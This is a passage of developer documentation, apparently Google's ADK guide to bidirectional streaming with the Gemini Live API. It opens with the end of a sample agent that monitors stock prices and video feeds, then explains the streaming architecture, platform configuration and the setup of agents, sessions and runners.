yield price_alert1 print(price_alert1) await asyncio.sleep(20) price_alert1 = f"the price for {stock_symbol} is 900" yield price_alert1 print(price_alert1) await asyncio.sleep(20) price_alert1 = f"the price for {stock_symbol} is 500" yield price_alert1 print(price_alert1) # for video streaming, `input_stream: LiveRequestQueue` is required and reserved key parameter for ADK to pass the video streams in. async def monitor_video_stream( input_stream: LiveRequestQueue, ) -> AsyncGenerator[str, None]: """Monitor how many people are in the video streams.""" print("start monitor_video_stream!") client = Client(vertexai=False) prompt_text = ( "Count the number of people in this image. Just respond with a numeric" " number." ) last_count = None while True: last_valid_req = None print("Start monitoring loop") # use this loop to pull the latest images and discard the old ones while input_stream._queue.qsize() != 0: live_req = await input_stream.get() if live_req.blob is not None and live_req.blob.mime_type == "image/jpeg": last_valid_req = live_req # If we found a valid image, process it if last_valid_req is not None: print("Processing the most recent frame from the queue") # Create an image part using the blob's data and mime type image_part = genai_types.Part.from_bytes( data=last_valid_req.blob.data, mime_type=last_valid_req.blob.mime_type ) contents = genai_types.Content( role="user", parts=[image_part, genai_types.Part.from_text(prompt_text)], ) # Call the model to generate content based on the provided image and prompt response = client.models.generate_content( model="gemini-2.0-flash-exp", contents=contents, config=genai_types.GenerateContentConfig( system_instruction=( "You are a helpful video analysis assistant. You can count" " the number of people in this image or video. Just respond" " with a numeric number." ) ), ) if not last_count: last_count = response.candidates[0].content.parts[0].text elif last_count != response.candidates[0].content.parts[0].text: last_count = response.candidates[0].content.parts[0].text yield response print("response:", response) # Wait before checking for new images await asyncio.sleep(0.5) # Use this exact function to help ADK stop your streaming tools when requested. # for example, if we want to stop `monitor_stock_price`, then the agent will # invoke this function with stop_streaming(function_name=monitor_stock_price). def stop_streaming(function_name: str): """Stop the streaming Args: function_name: The name of the streaming function to stop. """ pass root_agent = Agent( model="gemini-2.0-flash-exp", name="video_streaming_agent", instruction=""" You are a monitoring agent. You can do video monitoring and stock price monitoring using the provided tools/functions. When users want to monitor a video stream, You can use monitor_video_stream function to do that. When monitor_video_stream returns the alert, you should tell the users. When users want to monitor a stock price, you can use monitor_stock_price. Don't ask too many questions. Don't be too talkative. """, tools=[ monitor_video_stream, monitor_stock_price, FunctionTool(stop_streaming), ] ) ``` Here are some sample queries to test: - Help me monitor the stock price for $XYZ stock. - Help me monitor how many people are there in the video stream. # Part 1: Introduction to ADK Bidi-streaming Google's Agent Development Kit ([ADK](https://google.github.io/adk-docs/)) provides a production-ready framework for building Bidi-streaming applications with Gemini models. This guide introduces ADK's streaming architecture, which enables real-time, two-way communication between users and AI agents through multimodal channels (text, audio, video). **What you'll learn**: This part covers the fundamentals of Bidi-streaming, the underlying Live API technology (Gemini Live API and Vertex AI Live API), ADK's architectural components (`LiveRequestQueue`, `Runner`, `Agent`), and a complete FastAPI implementation example. You'll understand how ADK handles session management, tool orchestration, and platform abstraction—reducing months of infrastructure development to declarative configuration. ## ADK Bidi-streaming Demo To help you understand the concepts in this guide, we provide a working demo application that showcases ADK bidirectional streaming in action. This FastAPI-based demo implements the complete streaming lifecycle with a practical, real-world architecture. **Demo Repository**: [adk-samples/python/agents/bidi-demo](https://github.com/google/adk-samples/tree/main/python/agents/bidi-demo) The demo features: - **WebSocket Communication**: Real-time bidirectional streaming with concurrent upstream/downstream tasks - **Multimodal Requests**: Text, audio, and image/video input with automatic transcription - **Flexible Responses**: Text or audio output based on model capabilities - **Interactive UI**: Web interface with event console for monitoring Live API events - **Google Search Integration**: Agent equipped with tool calling capabilities **We strongly recommend installing and running this demo** before diving into the guide. Hands-on experimentation will help you understand the concepts more deeply, and the demo code serves as a practical reference throughout all parts of this guide. For installation instructions and usage details, see the [demo README](https://github.com/google/adk-samples/tree/main/python/agents/bidi-demo). ## 1.1 What is Bidi-streaming? Bidi-streaming (Bidirectional streaming) represents a fundamental shift from traditional AI interactions. Instead of the rigid "ask-and-wait" pattern, it enables **real-time, two-way communication** where both human and AI can speak, listen, and respond simultaneously. This creates natural, human-like conversations with immediate responses and the revolutionary ability to interrupt ongoing interactions. Think of the difference between sending emails and having a phone conversation. Traditional AI interactions are like emails—you send a complete message, wait for a complete response, then send another complete message. Bidi-streaming is like a phone conversation—fluid, natural, with the ability to interrupt, clarify, and respond in real-time. ### Key Characteristics These characteristics distinguish Bidi-streaming from traditional AI interactions and make it uniquely powerful for creating engaging user experiences: - **Two-way Communication**: Continuous data exchange without waiting for complete responses. Users can interrupt the AI mid-response with new input, creating a natural conversational flow. The AI responds after detecting the user has finished speaking (via automatic voice activity detection or explicit activity signals). - **Responsive Interruption**: Perhaps the most important feature for the natural user experience—users can interrupt the agent mid-response with new input, just like in human conversation. If an AI is explaining quantum physics and you suddenly ask "wait, what's an electron?", the AI stops immediately and addresses your question. - **Best for Multimodal**: Bidi-streaming excels at multimodal interactions because it can process different input types simultaneously through a single connection. Users can speak while showing documents, type follow-up questions during voice calls, or seamlessly switch between communication modes without losing context. This unified approach eliminates the complexity of managing separate channels for each modality. ``` sequenceDiagram participant Client as User participant Agent Client->>Agent: "Hi!" Client->>Agent: "Explain the history of Japan" Agent->>Client: "Hello!" Agent->>Client: "Sure! Japan's history is a..." (partial content) Client->>Agent: "Ah, wait." Agent->>Client: "OK, how can I help?" [interrupted: true] ``` ### Difference from Other Streaming Types Understanding how Bidi-streaming differs from other approaches is crucial for appreciating its unique value. The streaming landscape includes several distinct patterns, each serving different use cases: Streaming Types Comparison **Bidi-streaming** differs fundamentally from other streaming approaches: - **Server-Side Streaming**: One-way data flow from server to client. Like watching a live video stream—you receive continuous data but can't interact with it in real-time. Useful for dashboards or live feeds, but not for conversations. - **Token-Level Streaming**: Sequential text token delivery without interruption. The AI generates response word-by-word, but you must wait for completion before sending new input. Like watching someone type a message in real-time—you see it forming, but can't interrupt. - **Bidi-streaming**: Full two-way communication with interruption support. True conversational AI where both parties can speak, listen, and respond simultaneously. This is what enables natural dialogue where you can interrupt, clarify, or change topics mid-conversation. ### Real-World Applications Bidi-streaming revolutionizes agentic AI applications by enabling agents to operate with human-like responsiveness and intelligence. These applications showcase how streaming transforms static AI interactions into dynamic, agent-driven experiences that feel genuinely intelligent and proactive. In a video of the [Shopper's Concierge demo](https://www.youtube.com/watch?v=LwHPYyw7u6U), the multimodal Bidi-streaming feature significantly improve the user experience of e-commerce by enabling a faster and more intuitive shopping experience. The combination of conversational understanding and rapid, parallelized searching culminates in advanced capabilities like virtual try-on, boosting buyer confidence and reducing the friction of online shopping. Also, there are many possible real-world applications for Bidi-streaming: #### Customer Service & Contact Centers This is the most direct application. The technology can create sophisticated virtual agents that go far beyond traditional chatbots. - Use case: A customer calls a retail company's support line about a defective product. - Multimodality (video): The customer can say, "My coffee machine is leaking from the bottom, let me show you." They can then use their phone's camera to stream live video of the issue. The AI agent can use its vision capabilities to identify the model and the specific point of failure. - Live Interaction & Interruption: If the agent says, "Okay, I'm processing a return for your Model X coffee maker," the customer can interrupt with, "No, wait, it's the Model Y Pro," and the agent can immediately correct its course without restarting the conversation. #### E-commerce & Personalized Shopping The agent can act as a live, interactive personal shopper, enhancing the online retail experience. - Use Case: A user is browsing a fashion website and wants styling advice. - Multimodality (Voice & Image): The user can hold up a piece of clothing to their webcam and ask, "Can you find me a pair of shoes that would go well with these pants?" The agent analyzes the color and style of the pants. - Live Interaction: The conversation can be a fluid back-and-forth: "Show me something more casual." ... "Okay, how about these sneakers?" ... "Perfect, add the blue ones in size 10 to my cart." #### Field Service & Technical Assistance Technicians working on-site can use a hands-free, voice-activated assistant to get real-time help. - Use Case: An HVAC technician is on-site trying to diagnose a complex commercial air conditioning unit. - Multimodality (Video & Voice): The technician, wearing smart glasses or using a phone, can stream their point-of-view to the AI agent. They can ask, "I'm hearing a strange noise from this compressor. Can you identify it and pull up the diagnostic flowchart for this model?" - Live Interaction: The agent can guide the technician step-by-step, and the technician can ask clarifying questions or interrupt at any point without taking their hands off their tools. #### Healthcare & Telemedicine The agent can serve as a first point of contact for patient intake, triage, and basic consultations. - Use Case: A patient uses a provider's app for a preliminary consultation about a skin condition. - Multimodality (Video/Image): The patient can securely share a live video or high-resolution image of a rash. The AI can perform a preliminary analysis and ask clarifying questions. #### Financial Services & Wealth Management An agent can provide clients with a secure, interactive, and data-rich way to manage their finances. - Use Case: A client wants to review their investment portfolio and discuss market trends. - Multimodality (Screen Sharing): The agent can share its screen to display charts, graphs, and portfolio performance data. The client could also share their screen to point to a specific news article and ask, "What is the potential impact of this event on my tech stocks?" - Live Interaction: Analyze the client's current portfolio allocation by accessing their account data.Simulate the impact of a potential trade on the portfolio's risk profile. ## 1.2 Gemini Live API and Vertex AI Live API ADK's Bidi-streaming capabilities are powered by Live API technology, available through two platforms: **[Gemini Live API](https://ai.google.dev/gemini-api/docs/live)** (via Google AI Studio) and **[Vertex AI Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api)** (via Google Cloud). Both provide real-time, low-latency streaming conversations with Gemini models, but serve different development and deployment needs. Throughout this guide, we use **"Live API"** to refer to both platforms collectively, specifying "Gemini Live API" or "Vertex AI Live API" only when discussing platform-specific features or differences. ### What is the Live API? Live API is Google's real-time conversational AI technology that enables **low-latency Bidi-streaming** with Gemini models. Unlike traditional request-response APIs, Live API establishes persistent WebSocket connections that support: **Core Capabilities:** - **Multimodal streaming**: Processes continuous streams of audio, video, and text in real-time - **Voice Activity Detection (VAD)**: Automatically detects when users finish speaking, enabling natural turn-taking without explicit signals. The AI knows when to start responding and when to wait for more input - **Immediate responses**: Delivers human-like spoken or text responses with minimal latency - **Intelligent interruption**: Enables users to interrupt the AI mid-response, just like human conversations - **Audio Transcription**: Real-time transcription of both user input and model output, enabling accessibility features and conversation logging without separate transcription services - **Session Management**: Long conversations can span multiple connections through session resumption, with the API preserving full conversation history and context across reconnections - **Tool Integration**: Function calling works seamlessly in streaming mode, with tools executing in the background while conversation continues **Native Audio Model Features:** - **Proactive Audio**: The model can initiate responses based on context awareness, creating more natural interactions where the AI offers help or clarification proactively (Native Audio models only) - **Affective Dialog**: Advanced models understand tone of voice and emotional context, adapting responses to match the conversational mood and user sentiment (Native Audio models only) Learn More For detailed information about Native Audio models and these features, see [Part 5: Audio and Video - Proactivity and Affective Dialog](https://google.github.io/adk-docs/streaming/dev-guide/part5/#proactivity-and-affective-dialog). **Technical Specifications:** - **Audio input**: 16-bit PCM at 16kHz (mono) - **Audio output**: 16-bit PCM at 24kHz (native audio models) - **Video input**: 1 frame per second, recommended 768x768 resolution - **Context windows**: Varies by model (typically 32k-128k tokens for Live API models). See [Gemini models](https://ai.google.dev/gemini-api/docs/models/gemini) for specific limits. - **Languages**: 24+ languages supported with automatic detection ### Gemini Live API vs Vertex AI Live API Both APIs provide the same core Live API technology, but differ in deployment platform, authentication, and enterprise features: | **Aspect** | **Gemini Live API** | **Vertex AI Live API** | | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **Access** | Google AI Studio | Google Cloud | | **Authentication** | API key (`GOOGLE_API_KEY`) | Google Cloud credentials (`GOOGLE_CLOUD_PROJECT`, `GOOGLE_CLOUD_LOCATION`) | | **Best for** | Rapid prototyping, development, experimentation | Production deployments, enterprise applications | | **Session Duration** | Audio-only: 15 min Audio+video: 2 min With [Part 4: Context Window Compression](https://google.github.io/adk-docs/streaming/dev-guide/part4/#live-api-context-window-compression): Unlimited | Both: 10 min With [Part 4: Context Window Compression](https://google.github.io/adk-docs/streaming/dev-guide/part4/#live-api-context-window-compression): Unlimited | | **Concurrent Sessions** | Tier-based quotas (see [API quotas](https://ai.google.dev/gemini-api/docs/quota)) | Up to 1,000 per project (configurable via quota requests) | | **Enterprise Features** | Basic | Advanced monitoring, logging, SLAs, session resumption (24h) | | **Setup Complexity** | Minimal (API key only) | Requires Google Cloud project setup | | **API Version** | `v1beta` | `v1beta1` | | **API Endpoint** | `generativelanguage.googleapis.com` | `{location}-aiplatform.googleapis.com` | | **Billing** | Usage tracked via API key | Google Cloud project billing | Live API Reference Notes **Concurrent session limits**: Quota-based and may vary by account tier or configuration. Check your current quotas in Google AI Studio or Google Cloud Console. **Official Documentation**: [Gemini Live API Guide](https://ai.google.dev/gemini-api/docs/live-guide) | [Vertex AI Live API Overview](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api) ## 1.3 ADK Bidi-streaming: For Building Realtime Agent Applications Building realtime Agent applications from scratch presents significant engineering challenges. While Live API provides the underlying streaming technology, integrating it into production applications requires solving complex problems: managing WebSocket connections and reconnection logic, orchestrating tool execution and response handling, persisting conversation state across sessions, coordinating concurrent data flows for multimodal inputs, and handling platform differences between development and production environments. ADK transforms these challenges into simple, declarative APIs. Instead of spending months building infrastructure for session management, tool orchestration, and state persistence, developers can focus on defining agent behavior and creating user experiences. This section explores what ADK handles automatically and why it's the recommended path for building production-ready streaming applications. **Raw Live API v. ADK Bidi-streaming:** | Feature | Raw Live API (`google-genai` SDK) | ADK Bidi-streaming (`adk-python` and `adk-java` SDK) | | ------------------------------------ | ------------------------------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **Agent Framework** | ❌ Not available | ✅ Single agent, multi-agent with sub-agents, and sequential workflow agents, Tool ecosystem, Deployment ready, Evaluation, Security and more (see [ADK Agent docs](https://google.github.io/adk-docs/agents/)) | | **Tool Execution** | ❌ Manual tool execution and response handling | ✅ Automatic tool execution (see [Part 3: Tool Call Events](https://google.github.io/adk-docs/streaming/dev-guide/part3/#tool-call-events)) | | **Connection Management** | ❌ Manual reconnection and session resumption | ✅ Automatic reconnection and session resumption (see [Part 4: Live API Session Resumption](https://google.github.io/adk-docs/streaming/dev-guide/part4/#live-api-session-resumption)) | | **Event Model** | ❌ Custom event structures and serialization | ✅ Unified event model with metadata (see [Part 3: Event Handling](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md)) | | **Async Event Processing Framework** | ❌ Manual async coordination and stream handling | ✅ `LiveRequestQueue`, `run_live()` async generator, automatic bidirectional flow coordination (see [Part 2](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md) and [Part 3](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md)) | | **App-level Session Persistence** | ❌ Manual implementation | ✅ SQL databases (PostgreSQL, MySQL, SQLite), Vertex AI, in-memory (see [ADK Session docs](https://google.github.io/adk-docs/sessions/)) | ### Platform Flexibility One of ADK's most powerful features is its transparent support for both [Gemini Live API](https://ai.google.dev/gemini-api/docs/live) and [Vertex AI Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api). This platform flexibility enables a seamless development-to-production workflow: develop locally with Gemini API using free API keys, then deploy to production with Vertex AI using enterprise Google Cloud infrastructure—all **without changing application code**, only environment configuration. #### How Platform Selection Works ADK uses the `GOOGLE_GENAI_USE_VERTEXAI` environment variable to determine which Live API platform to use: - `GOOGLE_GENAI_USE_VERTEXAI=FALSE` (or not set): Uses Gemini Live API via Google AI Studio - `GOOGLE_GENAI_USE_VERTEXAI=TRUE`: Uses Vertex AI Live API via Google Cloud This environment variable is read by the underlying `google-genai` SDK when ADK creates the LLM connection. No code changes are needed when switching platforms—only environment configuration changes. ##### Development Phase: Gemini Live API (Google AI Studio) ```bash # .env.development GOOGLE_GENAI_USE_VERTEXAI=FALSE GOOGLE_API_KEY=your_api_key_here ``` **Benefits:** - Rapid prototyping with free API keys from Google AI Studio - No Google Cloud setup required - Instant experimentation with streaming features - Zero infrastructure costs during development ##### Production Phase: Vertex AI Live API (Google Cloud) ```bash # .env.production GOOGLE_GENAI_USE_VERTEXAI=TRUE GOOGLE_CLOUD_PROJECT=your_project_id GOOGLE_CLOUD_LOCATION=us-central1 ``` **Benefits:** - Enterprise-grade infrastructure via Google Cloud - Advanced monitoring, logging, and cost controls - Integration with existing Google Cloud services - Production SLAs and support - **No code changes required** - just environment configuration By handling the complexity of session management, tool orchestration, state persistence, and platform differences, ADK lets you focus on building intelligent agent experiences rather than wrestling with streaming infrastructure. The same code works seamlessly across development and production environments, giving you the full power of Bidi-streaming without the implementation burden. ## 1.4 ADK Bidi-streaming Architecture Overview Now that you understand Live API technology and why ADK adds value, let's explore how ADK actually works. This section maps the complete data flow from your application through ADK's pipeline to Live API and back, showing which components handle which responsibilities. You'll see how key components like `LiveRequestQueue`, `Runner`, and `Agent` orchestrate streaming conversations without requiring you to manage WebSocket connections, coordinate async flows, or handle platform-specific API differences. ### High-Level Architecture ``` graph TB subgraph "Application" subgraph "Client" C1["Web / Mobile"] end subgraph "Transport Layer" T1["WebSocket / SSE (e.g. FastAPI)"] end end subgraph "ADK" subgraph "ADK Bidi-streaming" L1[LiveRequestQueue] L2[Runner] L3[Agent] L4[LLM Flow] end subgraph "LLM Integration" G1[GeminiLlmConnection] G2[Gemini Live API / Vertex AI Live API] end end C1 <--> T1 T1 -->|"live_request_queue.send()"| L1 L1 -->|"runner.run_live(queue)"| L2 L2 -->|"agent.run_live()"| L3 L3 -->|"_llm_flow.run_live()"| L4 L4 -->|"llm.connect()"| G1 G1 <--> G2 G1 -->|"yield LlmResponse"| L4 L4 -->|"yield Event"| L3 L3 -->|"yield Event"| L2 L2 -->|"yield Event"| T1 classDef external fill:#e1f5fe,stroke:#01579b,stroke-width:2px classDef adk fill:#f3e5f5,stroke:#4a148c,stroke-width:2px class C1,T1 external class L1,L2,L3,L4,G1,G2 adk ``` | Developer provides: | ADK provides: | Live API provide: | | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **Web / Mobile**: Frontend applications that users interact with, handling UI/UX, user input capture, and response display **[WebSocket](https://developer.mozilla.org/en-US/docs/Web/API/WebSocket) / [SSE](https://developer.mozilla.org/en-US/docs/Web/API/Server-sent_events) Server**: Real-time communication server (such as [FastAPI](https://fastapi.tiangolo.com/)) that manages client connections, handles streaming protocols, and routes messages between clients and ADK **`Agent`**: Custom AI agent definition with specific instructions, tools, and behavior tailored to your application's needs | **[LiveRequestQueue](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/agents/live_request_queue.py)**: Message queue that buffers and sequences incoming user messages (text content, audio blobs, control signals) for orderly processing by the agent **[Runner](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/runners.py)**: Execution engine that orchestrates agent sessions, manages conversation state, and provides the `run_live()` streaming interface **[RunConfig](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/agents/run_config.py)**: Configuration for streaming behavior, modalities, and advanced features **Internal components** (managed automatically, not directly used by developers): [LLM Flow](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/flows/llm_flows/base_llm_flow.py) for processing pipeline and [GeminiLlmConnection](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/models/gemini_llm_connection.py) for protocol translation | **[Gemini Live API](https://ai.google.dev/gemini-api/docs/live)** (via Google AI Studio) and **[Vertex AI Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api)** (via Google Cloud): Google's real-time language model services that process streaming input, generate responses, handle interruptions, support multimodal content (text, audio, video), and provide advanced AI capabilities like function calling and contextual understanding | This architecture demonstrates ADK's clear separation of concerns: your application handles user interaction and transport protocols, ADK manages the streaming orchestration and state, and Live API provide the AI intelligence. By abstracting away the complexity of LLM-side streaming connection management, event loops, and protocol translation, ADK enables you to focus on building agent behavior and user experiences rather than streaming infrastructure. ## 1.5 ADK Bidi-streaming Application Lifecycle ADK Bidi-streaming integrates Live API session into the ADK framework's application lifecycle. This integration creates a four-phase lifecycle that combines ADK's agent management with Live API's real-time streaming capabilities: - **Phase 1: Application Initialization** (Once at Startup) - ADK Application initialization - Create an [Agent](https://google.github.io/adk-docs/agents/): for interacting with users, utilize external tools, and coordinate with other agents. - Create a [SessionService](https://google.github.io/adk-docs/sessions/session/#managing-sessions-with-a-sessionservice): for getting or creating ADK `Session` - Create a [Runner](https://google.github.io/adk-docs/runtime/): for providing a runtime for the Agent - **Phase 2: Session Initialization** (Once per User Session) - ADK `Session` initialization: - Get or Create an ADK `Session` using the `SessionService` - ADK Bidi-streaming initialization: - Create a [RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/index.md) for configuring ADK Bidi-streaming - Create a [LiveRequestQueue](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md) for sending user messages to the `Agent` - Start a [run_live()](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md) event loop - **Phase 3: Bidi-streaming with `run_live()` event loop** (One or More Times per User Session) - Upstream: User sends message to the agent with `LiveRequestQueue` - Downstream: Agent responds to the user with `Event` - **Phase 4: Terminate Live API session** (One or More Times per User Session) - `LiveRequestQueue.close()` **Lifecycle Flow Overview:** ``` graph TD A[Phase 1: Application Init
Once at Startup] --> B[Phase 2: Session Init
Per User Connection] B --> C[Phase 3: Bidi-streaming
Active Communication] C --> D[Phase 4: Terminate
Close Session] D -.New Connection.-> B style A fill:#e3f2fd style B fill:#e8f5e9 style C fill:#fff3e0 style D fill:#ffebee ``` This flowchart shows the high-level lifecycle phases and how they connect. The detailed sequence diagram below illustrates the specific components and interactions within each phase. ``` sequenceDiagram participant Client participant App as Application Server participant Queue as LiveRequestQueue participant Runner participant Agent participant API as Live API rect rgb(230, 240, 255) Note over App: Phase 1: Application Initialization (Once at Startup) App->>Agent: 1. Create Agent(model, tools, instruction) App->>App: 2. Create SessionService() App->>Runner: 3. Create Runner(app_name, agent, session_service) end rect rgb(240, 255, 240) Note over Client,API: Phase 2: Session Initialization (Every Time a User Connected) Client->>App: 1. WebSocket connect(user_id, session_id) App->>App: 2. get_or_create_session(app_name, user_id, session_id) App->>App: 3. Create RunConfig(streaming_mode, modalities) App->>Queue: 4. Create LiveRequestQueue() App->>Runner: 5. Start run_live(user_id, session_id, queue, config) Runner->>API: Connect to Live API session end rect rgb(255, 250, 240) Note over Client,API: Phase 3: Bidi-streaming with run_live() Event Loop par Upstream: User sends messages via LiveRequestQueue Client->>App: User message (text/audio/video) App->>Queue: send_content() / send_realtime() Queue->>Runner: Buffered request Runner->>Agent: Process request Agent->>API: Stream to Live API and Downstream: Agent responds via Events API->>Agent: Streaming response Agent->>Runner: Process response Runner->>App: yield Event (text/audio/tool/turn) App->>Client: Forward Event via WebSocket end Note over Client,API: (Event loop continues until close signal) end rect rgb(255, 240, 240) Note over Client,API: Phase 4: Terminate Live API session Client->>App: WebSocket disconnect App->>Queue: close() Queue->>Runner: Close signal Runner->>API: Disconnect from Live API Runner->>App: run_live() exits end ``` In the following sections, you'll see each phase detailed, showing exactly when to create each component and how they work together. Understanding this lifecycle pattern is essential for building robust streaming applications that can handle multiple concurrent sessions efficiently. ### Phase 1: Application Initialization These components are created once when your application starts and shared across all streaming sessions. They define your agent's capabilities, manage conversation history, and orchestrate the streaming execution. #### Define Your Agent The `Agent` is the core of your streaming application—it defines what your AI can do, how it should behave, and which AI model powers it. You configure your agent with a specific model, tools it can use (like Google Search or custom APIs), and instructions that shape its personality and behavior. Demo implementation: [agent.py:10-15](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/google_search_agent/agent.py#L10-L15) ```python """Google Search Agent definition for ADK Bidi-streaming demo.""" import os from google.adk.agents import Agent from google.adk.tools import google_search # Default models for Live API with native audio support: # - Gemini Live API: gemini-2.5-flash-native-audio-preview-12-2025 # - Vertex AI Live API: gemini-live-2.5-flash-native-audio agent = Agent( name="google_search_agent", model=os.getenv("DEMO_AGENT_MODEL", "gemini-2.5-flash-native-audio-preview-12-2025"), tools=[google_search], instruction="You are a helpful assistant that can search the web." ) ``` The agent instance is **stateless and reusable**—you create it once and use it for all streaming sessions. Agent configuration is covered in the [ADK Agent documentation](https://google.github.io/adk-docs/agents/). Model Availability For the latest supported models and their capabilities, see [Part 5: Understanding Audio Model Architectures](https://google.github.io/adk-docs/streaming/dev-guide/part5/#understanding-audio-model-architectures). Agent vs LlmAgent `Agent` is the recommended shorthand for `LlmAgent` (both are imported from `google.adk.agents`). They are identical - use whichever you prefer. This guide uses `Agent` for brevity, but you may see `LlmAgent` in other ADK documentation and examples. #### Define Your SessionService The ADK [Session](https://google.github.io/adk-docs/sessions/session/) manages conversation state and history across streaming sessions. It stores and retrieves session data, enabling features like conversation resumption and context persistence. To create a `Session`, or get an existing one for a specified `session_id`, every ADK application needs to have a [SessionService](https://google.github.io/adk-docs/sessions/session/#managing-sessions-with-a-sessionservice). For development purpose, ADK provides a simple `InMemorySessionService` that will lose the `Session` state when the application shuts down. Demo implementation: [main.py:37](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L37) ```python from google.adk.sessions import InMemorySessionService # Define your session service session_service = InMemorySessionService() ``` For production applications, choose a persistent session service based on your infrastructure: **Use `DatabaseSessionService` if:** - You need persistent storage with SQLite, PostgreSQL, or MySQL - You're building single-server apps (SQLite) or multi-server deployments (PostgreSQL/MySQL) - You want full control over data storage and backups - Examples: - SQLite: `DatabaseSessionService(db_url="sqlite:///./sessions.db")` - PostgreSQL: `DatabaseSessionService(db_url="postgresql://user:pass@host/db")` **Use `VertexAiSessionService` if:** - You're already using Google Cloud Platform - You want managed storage with built-in scalability - You need tight integration with Vertex AI features - Example: `VertexAiSessionService(project="my-project")` Both provide session persistence capabilities—choose based on your infrastructure and scale requirements. With persistent session services, the state of the `Session` will be preserved even after application shutdown. See the [ADK Session Management documentation](https://google.github.io/adk-docs/sessions/) for more details. #### Define Your Runner The [Runner](https://google.github.io/adk-docs/runtime/) provides the runtime for the `Agent`. It manages the conversation flow, coordinates tool execution, handles events, and integrates with session storage. You create one runner instance at application startup and reuse it for all streaming sessions. Demo implementation: [main.py:50,53](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L50) ```python from google.adk.runners import Runner APP_NAME = "bidi-demo" # Define your runner runner = Runner( app_name=APP_NAME, agent=agent, session_service=session_service ) ``` The `app_name` parameter is required and identifies your application in session storage. All sessions for your application are organized under this name. ### Phase 2: Session Initialization #### Get or Create Session ADK `Session` provides a "conversation thread" of the Bidi-streaming application. Just like you wouldn't start every text message from scratch, agents need context regarding the ongoing interaction. `Session` is the ADK object designed specifically to track and manage these individual conversation threads. ##### ADK `Session` vs Live API session ADK `Session` (managed by SessionService) provides **persistent conversation storage** across multiple Bidi-streaming sessions (can spans hours, days or even months), while Live API session (managed by Live API backend) is **a transient streaming context** that exists only during single Bidi-streaming event loop (spans minutes or hours typically) that we will discuss later. When the loop starts, ADK initializes the Live API session with history from the ADK `Session`, then updates the ADK `Session` as new events occur. Learn More For a detailed comparison with sequence diagrams, see [Part 4: ADK `Session` vs Live API session](https://google.github.io/adk-docs/streaming/dev-guide/part4/#adk-session-vs-live-api-session). ##### Session Identifiers Are Application-Defined Sessions are identified by three parameters: `app_name`, `user_id`, and `session_id`. This three-level hierarchy enables multi-tenant applications where each user can have multiple concurrent sessions. Both `user_id` and `session_id` are **arbitrary string identifiers** that you define based on your application's needs. ADK performs no format validation beyond `.strip()` on `session_id`—you can use any string values that make sense for your application: - **`user_id` examples**: User UUIDs (`"550e8400-e29b-41d4-a716-446655440000"`), email addresses (`"alice@example.com"`), database IDs (`"user_12345"`), or simple identifiers (`"demo-user"`) - **`session_id` examples**: Custom session tokens, UUIDs, timestamp-based IDs (`"session_2025-01-27_143022"`), or simple identifiers (`"demo-session"`) **Auto-generation**: If you pass `session_id=None` or an empty string to `create_session()`, ADK automatically generates a UUID for you (e.g., `"550e8400-e29b-41d4-a716-446655440000"`). **Organizational hierarchy**: These identifiers organize sessions in a three-level structure: ```text app_name → user_id → session_id → Session ``` This design enables scenarios like: - Multi-tenant applications where different users have isolated conversation spaces - Single users with multiple concurrent chat threads (e.g., different topics) - Per-device or per-browser session isolation ##### Recommended Pattern: Get-or-Create The recommended production pattern is to check if a session exists first, then create it only if needed. This approach safely handles both new sessions and conversation resumption: Demo implementation: [main.py:155-161](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L155-L161) ```python # Get or create session (handles both new sessions and reconnections) session = await session_service.get_session( app_name=APP_NAME, user_id=user_id, session_id=session_id ) if not session: await session_service.create_session( app_name=APP_NAME, user_id=user_id, session_id=session_id ) ``` This pattern works correctly in all scenarios: - **New conversations**: If the session doesn't exist, it's created automatically - **Resuming conversations**: If the session already exists (e.g., reconnection after network interruption), the existing session is reused with full conversation history - **Idempotent**: Safe to call multiple times without errors **Important**: The session must exist before calling `runner.run_live()` with the same identifiers. If the session doesn't exist, `run_live()` will raise `ValueError: Session not found`. #### Create RunConfig [RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/index.md) defines the streaming behavior for this specific session—which modalities to use (text or audio), whether to enable transcription, voice activity detection, proactivity, and other advanced features. Demo implementation: 